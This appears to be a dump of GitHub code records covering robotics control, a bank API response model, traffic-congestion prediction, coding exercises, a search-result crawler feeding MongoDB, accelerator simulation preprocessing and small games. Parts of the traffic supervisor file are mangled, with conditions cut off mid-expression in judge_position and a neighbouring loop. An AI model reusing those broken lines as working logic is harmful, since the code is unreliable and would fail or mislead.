abs(turn))\t\t\n\n\t\tmsg.linear.x = float(round(leftFront*255))\n\t\tmsg.linear.y = float(round(rightFront*255))\n\t\tmsg.angular.x = float(round(leftBack*255))\n\t\tmsg.angular.y = float(round(rightBack*255))\n\n\n\n\t\tself.sent_drive.publish(msg)\n\n\tdef check_bouncing(self, com, arr):\n\t\tfor i in arr:\n\t\t\tif i == com:\n\t\t\t\treturn False\n\t\treturn True\n\ndef main():\n\trclpy.init()\n\n\tsub = Ps4()\n\trclpy.spin(sub)\n\n\trclpy.shutdown()\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"PoommipatWat/ABU","sub_path":"ps4.py","file_name":"ps4.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23013579759","text":"class Response_Model:\n def __init__(self,status=None,customerReferenceNumber=None,bankReferenceNumber=None,TransRefNo=None,BeneName=None,errorDetails=None,errorCode=None,errorDescription=None,errorType=None,errorSource=None,timestamp=None):\n self.status=status\n self.customerReferenceNumber=customerReferenceNumber\n self.bankReferenceNumber=bankReferenceNumber\n self.TransRefNo=TransRefNo\n self.BeneName=BeneName\n self.errorDetails=errorDetails\n self.errorCode=errorCode\n self.errorDescription=errorDescription\n self.errorType=errorType\n self.errorSource=errorSource\n self.timestamp=timestamp\n @staticmethod\n def from_json(json={}):\n response_model=Response_Model()\n response_model.status=json[\"status\"]\n response_model.customerReferenceNumber=json[\"customerReferenceNumber\"]\n response_model.bankReferenceNumber=json[\"bankReferenceNumber\"]\n response_model.BeneName=json[\"BeneName\"]\n response_model.errorDetails=json[\"errorDetails\"]\n response_model.errorCode=json[\"errorCode\"]\n response_model.errorDescription=json[\"errorDescription\"]\n response_model.errorType=json[\"errorType\"]\n response_model.errorSource=json[\"errorSource\"]\n response_model.timestamp=json[\"timestamp\"]\n response_model.TransRefNo=json['TransRefNo']\n return response_model\n\n","repo_name":"Official-BlackHat13/testpayoutaction","sub_path":"apis/bank_models/ICICI_Model/payment_response_model.py","file_name":"payment_response_model.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40625160484","text":"from util.grid import *\nimport json\nimport pickle\nimport calendar\nimport numpy as np\nimport pandas as pd\nimport util.PredictionUtil as pu\n\nfrom util.ConstructUtil import *\nfrom collections import defaultdict\nfrom collections import OrderedDict\nfrom treelib import Tree,Node\nfrom util.params import Params as param\n\n\n\n\nfrom model.convLSTM import *\n#from CNN_LSTM import *\n#from Model.C3D_convLSTM import *\nfrom keras.models import load_model\n\ndef get_congestion_tree(treefile, children_dict):\n treefile = \"/home/dixl/project/traffic_project/data/new_alltrees.json\"\n with open(treefile, \"r\") as fi:\n trees = json.load(fi)\n congestion_pattern = trees['alltrees']\n new_congestion_pattern = list()\n for pattern in congestion_pattern:\n if pattern not in new_congestion_pattern:\n new_congestion_pattern.append(pattern)\n repeat_pattern = list()\n n = len(new_congestion_pattern)\n for i in range(n):\n for j in range(i+1, n):\n if set(new_congestion_pattern[j]).issubset(new_congestion_pattern[i]):\n if new_congestion_pattern[j] not in repeat_pattern:\n repeat_pattern.append(new_congestion_pattern[j])\n\n if set(new_congestion_pattern[i]).issubset(new_congestion_pattern[j]):\n if new_congestion_pattern[i] not in repeat_pattern:\n repeat_pattern.append(new_congestion_pattern[i])\n new_congestion_pattern_ = list()\n for pattern in new_congestion_pattern:\n if pattern not in repeat_pattern:\n new_congestion_pattern_.append(pattern)\n congestion_tree_list = list()\n for nodes in new_congestion_pattern_:\n congestion_tree = Tree()\n used_nodes = defaultdict(list)\n used_nodes[0].append(nodes[0])\n congestion_tree.create_node(nodes[0],nodes[0])\n i=0\n while len(used_nodes[i]) != 0:\n for used_node in used_nodes[i]:\n for node in nodes:\n if used_node in children_dict[node]:\n if node not in list(congestion_tree.nodes.keys()):\n congestion_tree.create_node(node,node, parent = used_node)\n used_nodes[i+1].append(node)\n i+=1\n congestion_tree_list.append(congestion_tree)\n return congestion_tree_list\n\n\n\ndef get_min_max_GPS(data_dict):\n min_lon=1000\n min_lat=1000\n max_lon=0\n max_lat=0\n for key in data_dict:\n for row in data_dict[key]:\n for point in row:\n if point[0] > max_lat:\n max_lat = point[0]\n if point[0] < min_lat:\n min_lat = point[0]\n if point[1] > max_lon:\n max_lon = point[1]\n if point[1] < min_lon:\n min_lon = point[1]\n return min_lon, min_lat, max_lon, max_lat\ndef get_min_max_xy(data_dict):\n min_lon=1000\n min_lat=1000\n max_lon=0\n max_lat=0\n for point in data_dict:\n# point = data_dict[key]\n if point[0] > max_lat:\n max_lat = point[0]\n if point[0] < min_lat:\n min_lat = point[0]\n if point[1] > max_lon:\n max_lon = point[1]\n if point[1] < min_lon:\n min_lon = point[1]\n return min_lon, min_lat, max_lon, max_lat\n\n\ndef make_road_grid(n_c_p, shps, no_key):\n data_dict = dict()\n for no in n_c_p:\n data_dict[no_key[no]] = shps[no_key[no]]\n min_lon, min_lat, max_lon, max_lat = get_min_max_GPS(data_dict)\n\n len_x = cal_distance([min_lat, min_lon], [max_lat, min_lon])\n len_y = cal_distance([min_lat, min_lon], [min_lat, max_lon])\n k = int((len_x+len_y)/200)\n if k==0:\n k=2\n ag = AreaGrid(k, min_lon, min_lat, max_lon, max_lat)\n\n keys = list(data_dict.keys())\n raw_road_grid = dict()\n for key in keys:\n grid_no = defaultdict(list)\n for row in data_dict[key]:\n for point in row:\n no = ag.gid(point)\n grid_no[no].append(point)\n raw_road_grid[key] = grid_no\n\n road_grid = defaultdict(list)\n for key in raw_road_grid:\n for no in raw_road_grid[key]:\n flag = 0\n if len(raw_road_grid[key][no]) > 2:\n flag=1\n road_grid[key].append(no)\n if flag==0:\n for no in raw_road_grid[key]:\n if no not in road_grid[key]:\n road_grid[key].append(no)\n keys = list(data_dict.keys())\n grid_road = defaultdict(list)\n for key in keys:\n for row in data_dict[key]:\n for point in row:\n no = ag.gid(point)\n str_key = key\n if str_key not in grid_road[no]:\n grid_road[no].append(str_key)\n\n return road_grid,grid_road,ag,k\n\n\ndef judge_grid(road1_name, road2_name,shps):\n shp1 = get_end_point(shps[road1_name])\n shp2 = get_end_point(shps[road2_name])\n if shp1[1] ==shp2[0]:\n lat_d = abs(shp1[0][0]-shp2[1][0])\n long_d = abs(shp1[0][1]-shp2[1][1])\n if lat_d > long_d:#2,7\n if shp1[0][0]>shp2[1][0]:\n return 8\n else:\n return 2\n else:\n if shp1[0][1]>shp2[1][1]:\n return 4\n else:\n return 6\n else:\n lat_d = abs(shp1[1][0]-shp2[0][0])\n long_d = abs(shp1[1][1]-shp2[0][1])\n if lat_d > long_d:#2,7\n if shp1[1][0]>shp2[0][0]:\n return 8\n else:\n return 2\n else:\n if shp1[1][1]>shp2[0][1]:\n return 4\n else:\n return 6\n\n\ndef judge_position(road1, road2, road1_name, road2_name, k,shps):\n\n if len(road1)>2:\n r1 = road1[1]\n else:\n r1 = road1[0]\n if len(road2)>2:\n r2 = road2[-2]\n else:\n r2 = road2[0]\n\n if int(r1/k)!=int(r2/k):#不同行\n ##\n if int(r1/k) > int(r2/k):#进入7,8,9\n if (r1-r2)%kint(k/2):\n return 9\n else:\n return 8\n else:\n if (r1-r2)%kint(k/2):\n return 1\n else:\n return 2\n else:#同行\n if r1>r2:\n return 4\n elif r1=10:\n for id_ in [1,2,3,4,6,7,8,9]:\n raw_position = get_position_2(road1_name,id_,road_relative_position)\n if raw_position not in position_road:\n road_relative_position[road2_name] = raw_position\n position_road[raw_position] = road2_name\n flag = 1\n break\n min_y, min_x, max_y, max_x = get_min_max_xy(position_road)\n rows = max_y - min_y + 1\n cols = max_x - min_x + 1\n number_road = dict()\n road_number = dict()\n for position in position_road:\n no = (position[1]-min_y)*cols + (position[0]-min_x) + 1\n number_road[no] =position_road[position]\n road_number[position_road[position]] = no\n mat_congestion = defaultdict(dict)\n nos =[i for i in range(1,rows*cols+1)]\n for dt in date_road_dict:\n weekday = calendar.weekday(int(dt[:4]),int(dt[5:7]),int(dt[8:10]))\n if workday:\n if weekday>4:\n continue\n else:\n if weekday<5:\n continue\n for no in nos:\n if no in number_road and number_road[no] in date_road_dict[dt]:\n mat_congestion[dt][no] = date_road_dict[dt][number_road[no]]\n else:\n mat_congestion[dt][no] = 0\n nos_reverse = [i for i in range(rows*cols,0,-1)]\n data_sort = pd.DataFrame.from_dict(mat_congestion, orient=\"index\", columns=nos_reverse)\n def fillna(data):\n nan_position = np.where(np.isnan(data))\n for i in range(len(nan_position[0])):\n x=nan_position[0][i]\n y=nan_position[1][i]\n if x==(data.shape[0]-1):\n data.iloc[x,y] = data.iloc[x-1,y]\n continue\n if x==0:\n if np.isnan(data.iloc[x+1,y]):\n for j in range(x+2,data.shape[0]):\n flag=0\n if np.isnan(data.iloc[j,y])==False:\n data.iloc[x,y] = (data.iloc[x-1,y] + data.iloc[j,y])/2\n flag=1\n continue\n if flag==0:\n data.iloc[x,y] = data.iloc[x-1,y]\n continue\n else:\n data.iloc[x,y] = data.iloc[x+1,y]\n continue\n if np.isnan(data.iloc[x+1,y]):\n for j in range(x+2,data.shape[0]):\n flag=0\n if np.isnan(data.iloc[j,y])==False:\n data.iloc[x,y] = (data.iloc[x-1,y] + data.iloc[j,y])/2\n flag=1\n break\n if flag==0:\n data.iloc[x,y] = data.iloc[x-1,y]\n else:\n data.iloc[x,y] = (data.iloc[x-1,y] + data.iloc[x+1,y])/2\n return data\n# date_index = pd.date_range(start=startTime,end=endTime,freq=\"min\",closed='left')\n date_index = list(mat_congestion.keys())\n date_index =pd.DataFrame(date_index,columns=[\"rawTime\"]).set_index(\"rawTime\")\n data_sort = date_index.join(data_sort)\n data_sort = fillna(data_sort)\n return data_sort,rows,cols,road_number,number_road\n\n\ndef reshape_data(data, split_num=1440, rows=39, cols=23, length=20):\n\n raw_data = data.values.reshape(data.shape[0],rows,cols,1)\n train_data = raw_data[:-split_num]\n test_data = raw_data[-split_num:]\n train_X, train_y = pu.split_X_y(train_data, length)\n test_X, test_y = pu.split_X_y(test_data, length)\n\n return train_X, train_y, test_X, test_y\n\n\ndef train(data_sort, rows, cols, number_road):\n\n train_X, train_y, test_X, test_y = reshape_data(data_sort, param.split_num, rows, cols, param.sequence_length)\n conv_model, conv_testy, conv_predicted = convLSTM_model(train_X, train_y, test_X, test_y, param.unit, param.epochs)\n# train_y = train_y.reshape(train_y.shape[0],train_y.shape[1]*train_y.shape[2])\n# test_y=test_y.reshape(test_y.shape[0],test_y.shape[1]*test_y.shape[2])\n# cnn_model, cnn_testy, cnn_predicted = CNN_LSTM_model(train_X, train_y, test_X, test_y,1)\n from sklearn.metrics import mean_squared_error\n from sklearn.metrics import mean_absolute_error\n\n testy_, predicted_ = get_reshape_data(conv_testy, conv_predicted, rows, cols)\n# testy_, predicted_ = cnn_testy, cnn_predicted\n true_y = list()\n predict_y = list()\n for n in range(testy_.shape[0]):\n for no in list(number_road.keys()):\n true_y.append(testy_[n][-no])\n predict_y.append(predicted_[n][-no])\n mse = mean_squared_error(true_y, predict_y)\n mae = mean_absolute_error(true_y, predict_y)\n print(\"mse=\",mse)\n print(\"mae=\",mae)\n return mse,mae","repo_name":"shirleyDXL/CPM-ConvLSTM","sub_path":"model/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":14097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"20"} +{"seq_id":"10893927507","text":"# coding:utf-8\r\n\r\n'''\r\ndate: 2017/11/5\r\ncontent: \r\n给出一个所有元素以升序排序的单链表,将它转换成一棵高度平衡的二分查找树\r\n\r\n样例\r\n 2\r\n1->2->3 => / \\\r\n 1 3\r\n'''\r\n\"\"\"\r\nDefinition of ListNode\r\n\"\"\"\r\nclass ListNode(object):\r\n\r\n def __init__(self, val, next=None):\r\n self.val = val\r\n self.next = next\r\n\r\n\"\"\"\r\nDefinition of TreeNode:\r\n\"\"\"\r\nclass TreeNode:\r\n def __init__(self, val):\r\n self.val = val\r\n self.left, self.right = None, None\r\n\r\n\r\nclass Solution:\r\n \"\"\"\r\n @param: head: The first node of linked list.\r\n @return: a tree node\r\n \"\"\"\r\n\r\n def sortedListToBST(self, head):\r\n if head is None:\r\n return head\r\n\r\n ret = self.bstHelper(head)\r\n return ret\r\n\r\n def bstHelper(self, head, mid=None):\r\n if head == mid:\r\n return\r\n if head.next == mid:\r\n return TreeNode(head.val)\r\n\r\n # step 1: find the middle point\r\n fast, slow = head, head\r\n while fast.next != mid and fast.next.next != mid:\r\n fast = fast.next.next\r\n slow = slow.next\r\n\r\n # step 2: key point -- how to set the limit of each side\r\n root = TreeNode(slow.val)\r\n left_stop = slow\r\n right_stop = mid\r\n right_start = slow.next\r\n\r\n # step 3: construct the ROOT\r\n root.left = self.bstHelper(head, left_stop)\r\n root.right = self.bstHelper(right_start, right_stop)\r\n\r\n return root\r\n\r\nif __name__ == '__main__':\r\n node = ListNode(1)\r\n node.next = ListNode(2)\r\n node.next.next = ListNode(3)\r\n node.next.next.next = ListNode(4)\r\n node.next.next.next.next = ListNode(5)\r\n\r\n s = Solution()\r\n ret = s.sortedListToBST(node)\r\n print(ret.val)\r\n\r\n'''\r\nso fucking hard! lol!!\r\n1.首先找到中间点mid,还是采用和sort_list中相同的思路:采用fast和slow的快慢指针\r\n2.第二步是关键,要找到下一次递归的左区间端点和右区间的端点(我在这里浪费了许多时间)\r\n3.第三步就是递归创建二叉平衡树\r\n'''","repo_name":"hanztup/yuangcode","sub_path":"lintcode/class6/must/covert_list_to_balanced_bst.py","file_name":"covert_list_to_balanced_bst.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"39374767781","text":"# 문제> google 검색해서 타이틀과 내용을 크롤링하여 50 ~ 60개 데이터를\r\n# 몽고 DB에 저장하세요.\r\n# 필드 : name, title, contents, regdate, hit ( name : 아무개)\r\n\r\n# DB 테스트 자료 만들기 위한 크롤링\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom pymongo import MongoClient, collection\r\nfrom datetime import datetime\r\n\r\nclient = MongoClient(host=\"localhost\", port = 27017)\r\ndb = client.webtest\r\ncollection = db.board\r\n\r\n# https://www.google.com/search?q=%ED%94%84%EB%A1%9C%EC%95%BC%EA%B5%AC&start=30\r\n\r\nheader = {\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\"}\r\n\r\nfor i in range(2):\r\n url = \"https://www.google.com/search?q={}&start={}\".format(\"투수\", i*10)\r\n res = requests.get(url, headers=header)\r\n\r\n bs = BeautifulSoup(res.text, \"lxml\")\r\n\r\n lists = bs.select(\"div.tF2Cxc\")\r\n # print(len(lists))\r\n\r\n for li in lists:\r\n current_utc_time = round(datetime.utcnow().timestamp()*1000)\r\n\r\n try:\r\n title = li.select_one(\"h3.LC20lb.DKV0Md\").text\r\n # print(title)\r\n contents = li.select_one(\"div.VwiC3b.yXK7lf.MUxGbd.yDYNvb.lyLwlc.lEBKkf\").text\r\n # print(\"컨텐츠 : \", contents)\r\n\r\n collection.insert_one({\r\n \"name\":\"아무개\",\r\n \"title\":title,\r\n \"contents\":contents,\r\n \"regdate\":current_utc_time,\r\n \"hit\":0\r\n }) \r\n except:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"codingq007/python","sub_path":"11_04_python_flask/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3989577132","text":"# D2\n# 노드의 거리\n\ndef is_connected(start, cnt):\n global result\n\n if cnt >= result:\n return\n\n if start == G:\n if cnt < result:\n result = cnt\n return\n\n for end in range(1, V+1):\n if adj[start][end] and not visited[start][end]:\n visited[start][end] = 1\n is_connected(end, cnt+1)\n visited[start][end] = 0\n\n\nT = int(input())\nfor tc in range(1, T+1):\n V, E = map(int, input().split())\n adj = [[0] * (V+1) for _ in range(V+1)]\n for _ in range(E):\n s, e = map(int, input().split())\n adj[s][e] = 1\n adj[e][s] = 1\n\n visited = [[0] * (V+1) for _ in range(V+1)]\n S, G = map(int, input().split())\n result = V + 1\n is_connected(S, 0)\n if result == V + 1:\n result = 0\n\n print('#{} {}'.format(tc, result))","repo_name":"charleyCho/algo","sub_path":"swea/queue/5102.py","file_name":"5102.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74424474288","text":"import numpy as np\r\nfrom input_parameters.preprocess import *\r\nfrom input_parameters.general_parameters import *\r\nimport matplotlib.pyplot as plt\r\nfrom beams.beams import *\r\nfrom input_parameters.rf_parameters import *\r\nfrom beams.slices import *\r\nfrom monitors.monitors import *\r\nfrom trackers.tracker import *\r\n\r\n'''\r\nTest case to show how to use preprocess_ramp and preprocess_rf_params in the main file\r\n(CERN PS Booster context).\r\n'''\r\n\r\n# Beam parameters\r\nparticle_type = 'proton'\r\nn_particles = 3e12\r\n\r\n\r\n# Machine and RF parameters\r\nradius = 25 # [m]\r\ngamma_transition = 4.076750841 # [1]\r\nalpha = 1 / gamma_transition**2 # [1] \r\nC = 2*np.pi*radius # [m] \r\n\r\n# Initial and final simulation times\r\ninitial_time = 0.275 # [s]\r\nfinal_time = 0.700 # [s]\r\n\r\nmomentum_program = np.loadtxt('../input_files/TC6_Source_TOF_P.csv', delimiter=',')\r\ntime_array = momentum_program[:, 0]*1e-3 # [s]\r\nmomentum = momentum_program[:, 1]*1e9 # [eV/c]\r\n\r\ninitial_index = np.min(np.where(time_array>=initial_time)[0])\r\nfinal_index = np.max(np.where(time_array<=final_time)[0])\r\n\r\ntime_cut = time_array[initial_index:(final_index+1)]\r\nmomentum_cut = momentum[initial_index:(final_index+1)]\r\n\r\nmomentum_interp = preprocess_ramp(particle_type, C, time_cut, momentum_cut, interpolation='linear', figdir='../output_files/TC6_fig')\r\n\r\nn_turns = len(momentum_interp[0])-1\r\n\r\ngeneral_params = GeneralParameters(n_turns, C, alpha, momentum_interp, \r\n particle_type)\r\n\r\n# Cavities parameters\r\nn_rf_systems = 2 \r\nharmonic_numbers_1 = 1 # [1] \r\nharmonic_numbers_2 = 2 # [1] \r\nphi_offset_1 = 0 # [rad]\r\nphi_offset_2 = np.pi # [rad]\r\n\r\nvoltage_program_C02 = np.loadtxt('../input_files/TC6_voltage_program_LHC25_c02.txt')\r\nvoltage_program_C04 = np.loadtxt('../input_files/TC6_voltage_program_LHC25_c04.txt')\r\nvoltage_program_C16 = np.loadtxt('../input_files/TC6_voltage_program_LHC25_c16.txt')\r\ntime_C02 = voltage_program_C02[:, 0]*1e-3 # [s]\r\nvoltage_C02 = voltage_program_C02[:, 1]*1e3 # [V]\r\ntime_C04 = voltage_program_C04[:, 0]*1e-3 # [s]\r\nvoltage_C04 = voltage_program_C04[:, 1]*1e3 # [V]\r\ntime_C16 = voltage_program_C16[:, 0]*1e-3 # [s]\r\nvoltage_C16 = voltage_program_C16[:, 1]*1e3 # [V]\r\n\r\ndata_interp = preprocess_rf_params(general_params, [time_C02, time_C04, time_C16], [voltage_C02, voltage_C04, voltage_C16], interpolation='linear', smoothing = 0,\r\n plot=True, figdir='../output_files/TC6_fig', figname=['voltage_C02 [V]', 'voltage_C04 [V]', 'voltage_C16 [V]'], sampling=1)\r\n\r\nrf_params = RFSectionParameters(general_params, 2, [harmonic_numbers_1,harmonic_numbers_2], [data_interp[0], data_interp[1]], [phi_offset_1, phi_offset_2])\r\n","repo_name":"kiliakis/BLonD","sub_path":"__TEST_CASES/main_files/TC6_Preprocess.py","file_name":"TC6_Preprocess.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12413952354","text":"from typing import List\n\n\nwith open(\"../data.txt\", \"r\") as f:\n input_data = [x.strip() for x in f.readlines()]\n\ndef invert_binary(number):\n temp = int(number, 2)\n inverse = temp ^ (2 ** (len(number) + 1) - 1)\n\n return str(bin(inverse)[3:])\n\ndef rating(data: List, position: int, is_most_common: bool) -> int:\n if len(data) == 1:\n return int(data[0], 2)\n \n one_occurrences = sum([int(binary_number[position]) for binary_number in data if binary_number[position] == \"1\"])\n same_occurrences = one_occurrences == len(data) / 2\n more_ones = one_occurrences > len(data) / 2\n\n new_data = []\n\n if is_most_common:\n if more_ones or same_occurrences:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"1\"]\n else:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"0\"]\n else:\n if more_ones or same_occurrences:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"0\"]\n else:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"1\"]\n\n return rating(new_data, position + 1, is_most_common)\n\n\ndef problem1():\n one_occurrences = [0] * len(input_data[0])\n\n for binary_number in input_data:\n for i, bit in enumerate(binary_number):\n if bit == \"1\":\n one_occurrences[i] += 1\n\n gamma = \"\"\n for occurrence in one_occurrences:\n if occurrence > len(input_data) / 2:\n gamma += \"1\"\n continue\n gamma += \"0\"\n\n epsilon = invert_binary(gamma)\n\n print(gamma, epsilon)\n\n n_gamma = int(gamma, 2)\n n_epsilon = int(epsilon, 2)\n\n print(f\"Result {n_gamma * n_epsilon}\")\n\n\ndef problem2():\n oxygen = rating(input_data, 0, True)\n co2 = rating(input_data, 0, False)\n print(oxygen * co2)\n\nif __name__ == '__main__':\n problem1()\n problem2()","repo_name":"danibaal98/advent-of-code-2021","sub_path":"day3/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"240521450","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %% [markdown]\n# ## AGENDA\n# \n# 1. Introduction to Linked lists\n# 2. Types of Linked lists\n# 3. Linked list implementation\n# 4. Practice and Exercises\n# %% [markdown]\n# ## Why do we need Linked lists?\n# %% [markdown]\n# Let's look at a simple list:\n# \n# ```our_simple_list = [290, 401, 156, 374, 239]```\n# \n# let's assume now that we want to insert a new element ```14``` at location 1. What Python does in a simple list when running that command, is to move all elements until the end of the list. \n# \n# ```our_simple_list.insert(1, 14)```\n# \n#
\n# \n#
\n# \n# %% [markdown]\n# Array insertion space complexity = O(n)\n# \n# What does this mean if we have 1 million elements? \n# %% [markdown]\n# ```Linked lists``` makes the insertion and deletion of elements cheaper because the values are stored in different areas of memory (lists store the values in contiguous memory location). \n# \n# The values of a linked lists are stored at random memory location, but are linked with each other by **pointers**.\n# %% [markdown]\n# # Linked List\n# \n# ## Singly Linked Lists\n# \n#
\n# \n#
\n# \n#
\n# \n# ## Doubly Linked Lists\n# \n#
\n# \n#
\n# %% [markdown]\n# ## Space complexity\n# \n# | Operation | List | Linked List |\n# | :- | -: | :-: |\n# | Indexing | O(1) | O(n) |\n# | Insert/Delete Element at Start | O(n) | O(1) |\n# | Insert/Delete Element at End | O(1) | O(1) |\n# | Insert/Delete Element at Middle | O(n) | O(n) |\n# %% [markdown]\n# ## Linked Lists Disadvantages\n# \n# 1. Random access is not allowed. You have to access elements sequentially starting from the first node. \n# 2. Extra memory space for a pointer is required with each element of the list.\n# 3. Not cache friendly.\n# %% [markdown]\n# ## Linked Lists vs Arrays\n# \n# **Linked lists are preferable over arrays when:**\n# \n# - you need constant-time insertions/deletions from the list (such as in real-time computing where time predictability is absolutely critical)\n# - you don't know how many items will be in the list.\n# - you don't need random access to any elements\n# \n# **Arrays are preferable when:**\n# \n# - you need indexed/random access to elements\n# - you know the number of elements in the array ahead of time so that you can allocate the correct amount of memory for the array\n# - you need speed when iterating through all the elements in sequence.\n# - memory is a concern. Filled arrays take up less memory than linked lists. Each element in the array is just the data. Each linked list node requires the data as well as one (or more) pointers to the other elements in the linked list.\n# %% [markdown]\n# # Linked List Implementation\n\n# %%\n''' APPROACH 1 '''\nclass Node:\n def __init__(self, value, nextNode = None):\n self.value = value # anything that you want to store (e.g., strings, integers, objects, etc)\n self.nextNode = nextNode #pointer to the next element in the linked list\n\n# '3' -> '7' -> '10'\n\nnode_1 = Node('3') # isolated node '3'\nnode_2 = Node('7') # isolated node '7'\nnode_3 = Node('10') # isolated node '10'\nnode_4 = Node('77') # isolated node '77'\n\nnode_1.nextNode = node_2 # node_1 points to node_2, '3' -> '7' \nnode_2.nextNode = node_3 # node_2 points to node_3, '7' -> '10' \n\n# node_1 -> node_2 -> node_3\n\n# Let's test it out \ncurrentNode = node_1 # node_1 is our head \nwhile True: \n print(currentNode.value, '-->', end=' ')\n if currentNode.nextNode is None: # ensure that the current node is not tail\n print('None')\n break\n currentNode = currentNode.nextNode # update with the next node \n\n\n# %%\n''' APPROACH 2'''\n\nclass Node:\n def __init__(self, value, nextNode = None):\n self.value = value # anything that you want to store (e.g., strings, integers, objects, etc)\n self.nextNode = nextNode #pointer to the next element in the linked list\n\nclass LinkedList: # initially empty \n def __init__(self, head = None):\n self.head = head \n\n def insert(self, value):\n node = Node(value) # create a node with the corresponding value \n if self.head is None: # check if there are other nodes \n self.head = node # if there are no other nodes, our current node is the head\n return \n\n # look at the head node and try to find the tail by traversing\n # the entire linked list \n currentNode = self.head\n while True:\n # satisfied only if the current node is tail\n if currentNode.nextNode is None: # if there is no node after the current node\n currentNode.nextNode = node \n break\n currentNode = currentNode.nextNode # otherwise, set the next to current node\n\n # method to print the linked list \n def print_linked_list(self):\n currentNode = self.head\n while currentNode is not None:\n print(currentNode.value, '-->', end=' ')\n currentNode = currentNode.nextNode\n print('None')\n\nll = LinkedList()\nll.print_linked_list()\nll.insert('3')\nll.print_linked_list()\nll.insert('7')\nll.print_linked_list()\nll.insert('10')\nll.print_linked_list()\n\n# %% [markdown]\n# ## Linked Lists and Python \n# \n# Python does not have a linked list library built into it like some other programming languages so we need to create our own classes like above. However, there are some packages that can create data structures that behave as linked lists (but are not linked lists!), such as ```deque()```.\n\n","repo_name":"nasiana/Software-17-Linked-lists","sub_path":"linked_lists.py","file_name":"linked_lists.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"29166005278","text":"\n\"\"\"as refrence, I used this tutorial http://anh.cs.luc.edu/handsonPythonTutorial/madlib2.html\"\"\"\n\ndef main (): #https://www.pinterest.com/pin/375839531387234463 story found here.\n story = \"\"\" \\033[42m Pizza was invented by a \\033[0;32m{adjective} \\033[0;34m {nationality} chef named {name}. To make a pizza, you need to take a lump of \\033[0;37m {noun}, and make a thin, round \\033[4;33m{adjective} \\033[4;33m{noun}. Then you cover it with \\033[0;31m{adjective} sauce, \\033[0;35m {adjective} cheese, and fresh chopped \\033[1;31m{plural_noun}. Next you have to bake it in a very hot {noun}. When it is done, cut it into {number} {shapes}. some kids like {food} pizza. If I could, I would eat pizza {number} times a day. \"\"\"\n\n tellStory(story)\n print(\"come back Soon!\")\ndef getKeys(user_input):\n keylist = list ()\n end = 0\n words = user_input.count('{')\n for i in range (words):\n start = user_input.find('{', end) + 1\n end = user_input.find('}', start)\n key = user_input[start : end]\n keylist.append(key)\n\n return (keylist)\n\ndef addPicks(cue, dictionary): # \"Enter a specific example for {name}: \"\n user_input = \"Enter a {name} : \"\n prompt = user_input.format(name=cue)\n response = input(prompt)\n dictionary[cue] = response\n\ndef getUserPicks(cues):\n userPicks = dict()\n for cue in cues:\n addPicks(cue,userPicks)\n return userPicks\ndef tellStory(storyFormat):\n cues = getKeys(storyFormat)\n userPicks = getUserPicks(cues)\n story = storyFormat.format(**userPicks)\n print(story) \n\n\nmain()\n\n\n\n","repo_name":"xingY97/madlibs","sub_path":"madlibs2.py","file_name":"madlibs2.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7794132903","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 25 14:20:20 2021\r\n\r\n@author: rahul\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport ast\r\nfrom Market_clearing import Market_clearing\r\n#%% Case data\r\n\r\nSetpoint_P = pd.read_csv('Data_Files\\Setpoint_P.csv',index_col='timetarget',converters={1:ast.literal_eval}) # Baseline injections at each node (negative for retrieval)\r\nSetpoint_P.columns = ['Setpoint_P']\r\nSetpoint_Q = pd.read_csv('Data_Files\\Setpoint_Q.csv',index_col='timetarget',converters={1:ast.literal_eval})\r\nSetpoint_Q.columns = ['Setpoint_Q']\r\n\r\nSetpoint=pd.DataFrame([], columns=['Setpoint_P','Setpoint_Q'], index=Setpoint_P.index)\r\n\r\nfor t in Setpoint_P.index:\r\n Setpoint.at[t,'Setpoint_P']=Setpoint_P.at[t,'Setpoint_P']\r\n Setpoint.at[t,'Setpoint_Q']=Setpoint_Q.at[t,'Setpoint_Q']\r\n \r\n# Index for nodes\r\nbus = pd.read_excel(open('Data_Files/network15bus.xlsx', 'rb'),sheet_name='Bus',index_col=0)\r\nbus.columns = ['type', 'Vmax', 'Vmin']\r\nnodes = list(bus.index)\r\n\r\n# Upload bids\r\nall_bids = pd.read_csv('Data_Files\\Bids.csv',index_col=0)\r\n\r\nall_bids.columns = ['Bid','Type','Bus','P_or_Q', 'Direction','Quantity','Price','Time_target','Time_stamp']\r\nall_bids.index.names = ['ID']\r\n\r\n# Create empty dataframes to contain the bids that were not matched (order 